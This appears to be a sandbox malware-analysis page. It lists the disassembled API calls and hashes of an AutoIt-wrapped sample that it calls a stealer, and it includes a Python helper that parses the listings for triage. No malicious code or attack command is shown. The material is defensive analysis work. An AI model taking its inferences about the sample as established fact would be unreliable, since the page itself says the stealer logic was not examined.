(graph image not reproduced; legend: Executed / Not Executed. Node list recovered from the page: basic blocks 524d83-524ec6 and 560965-560a4f; the message dispatch reaches DefWindowProcW at 524e1a, KillTimer at 524e49, SetTimer and RegisterWindowMessageW at 524e65, CreatePopupMenu at 524e8e, PostQuitMessage at 524ead, SetFocus at 56098d and MoveWindow at 56099e)

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00524E22
• KillTimer.USER32(?,00000001), ref: 00524E4C
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00524E6F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00524E7A
• CreatePopupMenu.USER32 ref: 00524E8E
• PostQuitMessage.USER32(00000000), ref: 00524EAF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 54ef3417d03102d2ffdc096a0ebbb4f304eb42fa8cbe396e8c6b734ebddceb59
• Instruction ID: b863d246faa189fdb2ed848128c65e7e6e1a1ba57227fa89064eb5318f8f79bd
• Opcode Fuzzy Hash: 54ef3417d03102d2ffdc096a0ebbb4f304eb42fa8cbe396e8c6b734ebddceb59
• Instruction Fuzzy Hash: AC41F63115816AABFB255F28AC0DB7E3E99FF56300F050917F502922E1EB719C54AB62

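The API bullets in these function listings are printed in a fixed format, so they can be consumed by a triage script directly. The following is an added example written for this page, not Joe Sandbox or AutoIt code: it parses the bullets from the listings above (the GUI class registration, the Software\AutoIt v3\AutoIt include-path lookup, the Ping routine with its IcmpSendEcho calls, and the window procedure and tray-icon routines that follow), names the IcmpSendEcho arguments, and tags what the calls reveal. Assumptions: the bullet format is exactly the one shown on this page; sizeof(ICMP_ECHO_REPLY) is taken as 28 bytes because the 0x005xxxxx addresses indicate a 32-bit image; the tag names are the example's own.

```python
"""Triage helper for Joe Sandbox 'APIs' bullets (added example, not Joe Sandbox code)."""
import re

# One API bullet as printed on this page, e.g.
#   • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F4D
#   • IcmpCreateFile.IPHLPAPI ref: 00585EDD
#   • Part of subcall function 005300CF: GetModuleFileNameW.KERNEL32(...), ref: 005300ED
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Input copied from the function listings on this page (GUI init, include-path
# registry lookup, Ping routine, tray icon); no lines were invented.
SAMPLE_API_LINES = r"""
• GetSysColorBrush.USER32(0000000F), ref: 00513444
• RegisterClassExW.USER32(00000030), ref: 0051346E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0051347F
• Part of subcall function 005300CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00523094), ref: 005300ED
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005230E2
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005601BA
• _wcscat.LIBCMT ref: 00560292
• WSAStartup.WS2_32(00000101,?), ref: 00585E7E
• gethostbyname.WS2_32(?), ref: 00585ECF
• IcmpCreateFile.IPHLPAPI ref: 00585EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00585F4D
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00585FD8
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
"""

# Strings emitted by the AutoIt v3 interpreter itself: its window class name and
# the registry key it reads to locate its include directory.
AUTOIT_MARKERS = ("AutoIt v3 GUI", "Software\\AutoIt v3\\AutoIt")

# sizeof(ICMP_ECHO_REPLY) in a 32-bit process (assumption: the sample is x86).
ICMP_ECHO_REPLY_SIZE_X86 = 28


def parse_arg(tok):
    """'?' -> None (unresolved by the plugin), 8 hex digits -> int, else str."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text):
    """Return one dict per API bullet; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [parse_arg(a) for a in raw_args.split(",")] if raw_args else [],
            "ref": int(m.group("ref"), 16),
            "subcall_of": m.group("sub"),
        })
    return calls


def decode_icmp_send_echo(call):
    """Name the IcmpSendEcho arguments (IcmpHandle, DestinationAddress, RequestData,
    RequestSize, RequestOptions, ReplyBuffer, ReplySize, Timeout) and check ReplySize
    against the documented minimum sizeof(ICMP_ECHO_REPLY) + RequestSize + 8."""
    a = call["args"]
    request_size, reply_size, timeout_ms = a[3], a[6], a[7]
    expected = ICMP_ECHO_REPLY_SIZE_X86 + request_size + 8
    return {
        "request_size": request_size,
        "request_options_null": a[4] == 0,
        "reply_size": reply_size,
        "reply_size_matches_icmp_echo_reply": reply_size == expected,
        "timeout_ms": timeout_ms,
    }


def fingerprint(calls):
    """Tag behaviours visible from the API bullets alone (tag names are ours)."""
    tags = set()
    for c in calls:
        strings = [x for x in c["args"] if isinstance(x, str)]
        if any(marker in s for s in strings for marker in AUTOIT_MARKERS):
            tags.add("autoit-runtime")
        if c["api"] == "RegOpenKeyExW" and c["args"][:1] == [0x80000001]:
            tags.add("reads-hkcu")  # 0x80000001 is HKEY_CURRENT_USER
        if c["api"] == "RegisterWindowMessageW" and "TaskbarCreated" in strings:
            tags.add("tray-icon-recreate")
        if c["api"] == "Shell_NotifyIconW":
            tags.add("tray-icon")
        if c["api"] == "gethostbyname":
            tags.add("dns-resolve")
        if c["api"] == "IcmpSendEcho":
            tags.add("icmp-echo")
    return tags


def triage(text):
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "tags": fingerprint(calls),
        "icmp": [decode_icmp_send_echo(c) for c in calls if c["api"] == "IcmpSendEcho"],
    }


if __name__ == "__main__":
    print(triage(SAMPLE_API_LINES))
```

Run on the bullets from this page, the script reports that the IcmpSendEcho reply buffer of 0x29 = 41 bytes is exactly sizeof(ICMP_ECHO_REPLY) plus the 5-byte request plus the 8 bytes the API documentation reserves for an ICMP error, and that the timeout 0xFA0 is 4000 ms, the default of AutoIt's built-in Ping(), which fits the "Ping" string this routine references. The triage caveat: each of these routines belongs to the AutoIt interpreter that every compiled AutoIt executable carries, so their presence shows the sample is AutoIt-wrapped, not that the wrapped script calls Ping() or creates a tray icon. Whether a routine actually ran is what the Executed / Not Executed colouring of the control-flow graph records, and the stealer logic lives in the compiled script, which is the component to extract and decompile next.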
Control-flow Graph

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00560C5B
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
• _memset.LIBCMT ref: 00525787
• _wcscpy.LIBCMT ref: 005257DB
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
• __swprintf.LIBCMT ref: 00560CD1
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
• String ID: Line %d: $AutoIt -
• API String ID: 230667853-4094128768

Control-flow Graph

APIs
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005307EC
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 005307F4
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005307FF
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0053080A
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00530812
  • Part of subcall function 005307BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0053081A
  • Part of subcall function 0052FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0051AC6B), ref: 0052FFA7
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051AD08
• OleInitialize.OLE32(00000000), ref: 0051AD85
• CloseHandle.KERNEL32(00000000), ref: 00552F56
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID: <w]$\t]$s]
• API String ID: 1986988660-1717686022

Control-flow Graph 1227 (5250db-52514b): CreateWindowExW * 2, ShowWindow * 2

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
• ShowWindow.USER32(00000000), ref: 0052513E
• ShowWindow.USER32(00000000), ref: 00525147
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399

Control-flow Graph 1228 (entry block 579b16-579b9b; edge list omitted)

APIs
  • Part of subcall function 00524A8C: _fseek.LIBCMT ref: 00524AA4
  • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DE1
  • Part of subcall function 00579CF1: _wcscmp.LIBCMT ref: 00579DF4
• _free.LIBCMT ref: 00579C5F
• _free.LIBCMT ref: 00579C66
• _free.LIBCMT ref: 00579CD1
  • Part of subcall function 00532F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532F99
  • Part of subcall function 00532F85: GetLastError.KERNEL32(00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532FAB
• _free.LIBCMT ref: 00579CD9
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID: >>>AUTOIT SCRIPT<<<
• API String ID: 1552873950-2806939583

Control-flow Graph 1272 (entry block 53563d-535656; edge list omitted)

Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005152E6
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051534A
• TranslateMessage.USER32(?), ref: 00515356
• DispatchMessageW.USER32(?), ref: 00515360
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112A8
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112C9
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00511275,SwapMouseButtons,00000004,?), ref: 005112EB
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: d02c319b10cd95d21399fbadef9518797707d31f40a29140cf69d9788c02997b
• Instruction ID: 186c6eb203304e2d6b9c2f3b55bbeca7614b214977e260c9f318afdd741b763c
• Instruction Fuzzy Hash: AF115A75515608BFEB208FA5DC84EEFBBB8FF05740F004999F915D7110E2719E84A7A8
APIs
  • Part of subcall function 0053593C: __FF_MSGBANNER.LIBCMT ref: 00535953
  • Part of subcall function 0053593C: __NMSG_WRITE.LIBCMT ref: 0053595A
  • Part of subcall function 0053593C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
• std::exception::exception.LIBCMT ref: 0053101C
• __CxxThrowException@8.LIBCMT ref: 00531031
  • Part of subcall function 005387CB: RaiseException.KERNEL32(?,?,?,005CCAF8,?,?,?,?,?,00531036,?,005CCAF8,?,00000001), ref: 00538820
Strings
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID: `=Z$h=Z
• API String ID: 3902256705-1415512615
• Opcode ID: 3a8f6a7a992837ad8b664352e721e2e557ea8f1204d28f98764a1b336b6c7d66
• Instruction ID: 011b34abea63e9023a87d187c04850714c3260d31f2f9eb08ca056111ee7ee98
• Instruction Fuzzy Hash: A6F0A43550471EE6CB28AAA8DC1DAEEBFACBF41354F100465F914A2191EFB18B80C2A4
APIs
• _memset.LIBCMT ref: 00525B58
  • Part of subcall function 005256F8: _memset.LIBCMT ref: 00525787
  • Part of subcall function 005256F8: _wcscpy.LIBCMT ref: 005257DB
  • Part of subcall function 005256F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005257EB
• KillTimer.USER32(?,00000001,?,?), ref: 00525BAD
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00525BBC
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00560D7C
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 55b7a018703720e78e294007ab2aee56386ac5d4181cf6500f36236bebd8eb76
• Instruction ID: f95d9878fa874791137718fe3d27c036fb7cd5b65ae6d8b77b4d4ce089309bc3
• Instruction Fuzzy Hash: A921F570904794AFE7728B24D899BEBBFECBF12304F00158EE69A571C1D3746988DB41
APIs
  • Part of subcall function 005249C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005227AF,?,00000001), ref: 005249F4
• _free.LIBCMT ref: 0055FB04
• _free.LIBCMT ref: 0055FB4B
  • Part of subcall function 005229BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00522ADF
Strings
• Bad directive syntax error, xrefs: 0055FB33
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: Bad directive syntax error
• API String ID: 2861923089-2118420937
• Opcode ID: 2dd3b8e100d686dda04d36f6e8147b80f604172e5bfd2e963a3d614e8fbf7f46
• Instruction ID: 458e5f198012793b67904ae6ddbb91d9fd184535ce43fe074c05878ceb6f985f
• Instruction Fuzzy Hash: 7191707191022AEFCF04EFA4D8559EEBFB4FF49311F14452AF815AB2A1DB309949CB90
APIs
Strings
Similarity
• API ID: _memmove
• String ID: AU3! ?Z$EA06
• API String ID: 4104443479-1020467815
• Opcode ID: 7d2480c3b7ebb803f4bdacf43731ba740462a30a07523f67288755be71e316ec
• Instruction ID: 7caf76302b568214b138e5cab1302250eb347a02298b062195f52e89b0901f8e
• Instruction Fuzzy Hash: D0418F21A041785BDF21DB64A8557BF7FA5BF97310F284475E882EB2C6D6208DC4CBE1
APIs
  • Part of subcall function 00524AB2: __fread_nolock.LIBCMT ref: 00524AD0
• _wcscmp.LIBCMT ref: 00579DE1
• _wcscmp.LIBCMT ref: 00579DF4
Strings
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: ae3e9cc5e713eafa4d7d588e0af018d294c801f686a7497b2ae921e648929ffa
• Instruction ID: fd101452a179986f2b86a944a4e74e1280d873e54e6d7756fa0dc9a8a6bb6528
• Instruction Fuzzy Hash: AA41FB71A4021ABADF20DAA4DC49FEF7FBEFF85710F004469F904A7190D771A9449B64
APIs
• _memset.LIBCMT ref: 0056032B
• GetOpenFileNameW.COMDLG32(?), ref: 00560375
  • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
  • Part of subcall function 005309C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 005309E4
Strings
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: 5788ca033e7f0d622dc083561553d423f02f5c207f4f0926c995e4353251d1cf
• Instruction ID: ae405c7dd84da14f1173001bac92b89d3c90c4e8eb0c3d0fc34737cd34d1322d
• Instruction Fuzzy Hash: DA21A175A002989BCB41DFD4D849BEE7FF8BF4A304F00405AE404A7281DBB85A88DFA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b3985325c6efa8fe6e31068fed31140237f94c39fff897788fda1d8adbda5812
                                                                                                                                        • Instruction ID: a7dba5f07a9d3ab9df5ee713508ee85ebe7d6ba88984133771a93ae684c20a04
                                                                                                                                        • Opcode Fuzzy Hash: b3985325c6efa8fe6e31068fed31140237f94c39fff897788fda1d8adbda5812
                                                                                                                                        • Instruction Fuzzy Hash: DDF117706083059FCB14EF28C484A6ABBE5FFC9314F14892EF8999B291D770E945CF92
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 1b294a5719273f9dc6cb0906a1ab30d8138ec109d3bbf1f5e1c276df9b69a8ea
                                                                                                                                        • Instruction ID: 84b1aecef4048befce7493d4752f79bc674ac6d4351d8fbe823ef2096628756b
                                                                                                                                        • Opcode Fuzzy Hash: 1b294a5719273f9dc6cb0906a1ab30d8138ec109d3bbf1f5e1c276df9b69a8ea
                                                                                                                                        • Instruction Fuzzy Hash: 6061FF71600A09EBDF048F25E984AAE7BB4FF94310F1985A9EC09CF295EB31D960CB44
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005259F9
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00525ABB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1505330794-0
                                                                                                                                        • Opcode ID: 57ad9762fb6f81bd051c0d97807ac8df7c7cb1ba31cf69c5a27427c03fae8a91
                                                                                                                                        • Instruction ID: 14a95dcc256e79475ef65ede5945a4583e1ef0a0534d9fd901381ac4476a560d
                                                                                                                                        • Opcode Fuzzy Hash: 57ad9762fb6f81bd051c0d97807ac8df7c7cb1ba31cf69c5a27427c03fae8a91
                                                                                                                                        • Instruction Fuzzy Hash: 8B318EB45097158FC720DF24E889697BBE8FF5A305F000A2FF59A83280F771A948DB52
                                                                                                                                        APIs
                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00535953
                                                                                                                                          • Part of subcall function 0053A39B: __NMSG_WRITE.LIBCMT ref: 0053A3C2
                                                                                                                                          • Part of subcall function 0053A39B: __NMSG_WRITE.LIBCMT ref: 0053A3CC
                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0053595A
                                                                                                                                          • Part of subcall function 0053A3F8: GetModuleFileNameW.KERNEL32(00000000,005D53BA,00000104,00000004,00000001,00531003), ref: 0053A48A
                                                                                                                                          • Part of subcall function 0053A3F8: ___crtMessageBoxW.LIBCMT ref: 0053A538
                                                                                                                                          • Part of subcall function 005332CF: ___crtCorExitProcess.LIBCMT ref: 005332D5
                                                                                                                                          • Part of subcall function 005332CF: ExitProcess.KERNEL32 ref: 005332DE
                                                                                                                                          • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
                                                                                                                                        • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                        • Opcode ID: 1236f6c976386463a516b51933daf6ba8688f971a9495a7aabac60d1c7026b7c
                                                                                                                                        • Instruction ID: 7da3a9887be108af7122e72c512309c5b5bc19cf5c40a6eb11062d990952a52d
                                                                                                                                        • Opcode Fuzzy Hash: 1236f6c976386463a516b51933daf6ba8688f971a9495a7aabac60d1c7026b7c
                                                                                                                                        • Instruction Fuzzy Hash: A501D236241B06DAE61527349C06B2E3B48BF92770F101927F8159A2D1FE708D40C661
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 005792D6
                                                                                                                                          • Part of subcall function 00532F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532F99
